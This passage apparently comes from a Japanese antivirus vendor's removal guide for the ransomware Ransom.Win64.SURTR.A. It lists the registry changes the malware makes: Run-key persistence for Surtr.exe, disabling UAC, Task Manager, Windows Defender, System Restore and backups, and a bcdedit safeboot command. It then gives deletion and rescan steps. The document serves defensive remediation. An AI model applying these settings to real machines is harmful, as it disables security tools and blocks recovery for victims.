- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
- svchos1 = C:\ProgramData\Service\Surtr.exe
- svchos1 = C:\ProgramData\Service\Surtr.exe
- In HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
- svchos2 = C:\ProgramData\Service\Surtr.exe
- svchos2 = C:\ProgramData\Service\Surtr.exe
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\
- svchos3 = C:\ProgramData\Service\Surtr.exe
- svchos3 = C:\ProgramData\Service\Surtr.exe
- In HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\
- svchos4 = C:\ProgramData\Service\Surtr.exe
- svchos4 = C:\ProgramData\Service\Surtr.exe
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- EnableLUA = 0
- EnableLUA = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- EnableLinkedConnections = 1
- EnableLinkedConnections = 1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableTaskMgr = 1
- DisableTaskMgr = 1
- In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
- DisableAntiSpyware = 1
- DisableAntiSpyware = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
- AllowBlockingAppsAtShutdown = 1
- AllowBlockingAppsAtShutdown = 1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
- StartMenuLogOff = 1
- StartMenuLogOff = 1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
- NoRun = 1
- NoRun = 1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableChangePassword = 1
- DisableChangePassword = 1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableLockWorkstation = 1
- DisableLockWorkstation = 1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- NoLogoff = 1
- NoLogoff = 1
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
- {645FF040-5081-101B-9F08-00AA002F954E} = 1
- {645FF040-5081-101B-9F08-00AA002F954E} = 1
- In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE
- DisableSetup = 1
- DisableSetup = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore
- DisableConfig = 1
- DisableConfig = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore
- DisableSR = 1
- DisableSR = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client
- DisableBackupToDisk = 1
- DisableBackupToDisk = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client
- DisableBackupToNetwork = 1
- DisableBackupToNetwork = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client
- DisableBackupToOptical = 1
- DisableBackupToOptical = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client
- DisableBackupLauncher = 1
- DisableBackupLauncher = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client
- DisableRestoreUI = 1
- DisableRestoreUI = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client
- DisableBackupUI = 1
- DisableBackupUI = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client
- DisableSystemBackupUI = 1
- DisableSystemBackupUI = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server
- OnlySystemBackup = 1
- OnlySystemBackup = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server
- NoBackupToDisk = 1
- NoBackupToDisk = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server
- NoBackupToNetwork = 1
- NoBackupToNetwork = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server
- NoBackupToOptical = 1
- NoBackupToOptical = 1
- In HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server
- NoRunNowBackup = 1
- NoRunNowBackup = 1
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de}
- Enable = 0
- Enable = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- *test = bcdedit /deletevalue {current} safeboot
- *test = bcdedit /deletevalue {current} safeboot
- In HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
- *execute =
- *execute =
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surt\UserChoice
- ProgId = surt_auto_file
- ProgId = surt_auto_file
- In HKEY_CLASSES_ROOT\.surt
- = surt_auto_file
- = surt_auto_file
- In HKEY_CLASSES_ROOT\surt_auto_file\DefaultIcon
- = C:\ProgramData\Service\SurtrIcon.ico\
- = C:\ProgramData\Service\SurtrIcon.ico\
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableTaskMgr = 0
- DisableTaskMgr = 0
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
- NoRun = 0
- NoRun = 0
手順 7
以下のファイルを検索し削除します。
[ 詳細 ]
コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。 手順 8
以下のフォルダを検索し削除します。
[ 詳細 ]
フォルダが隠しフォルダ属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。 - C:\ProgramData\Service
- %temp%\Service\
手順 9
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Ransom.Win64.SURTR.A」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 10
暗号化されたファイルをバックアップから復元します。
ご利用はいかがでしたか? アンケートにご協力ください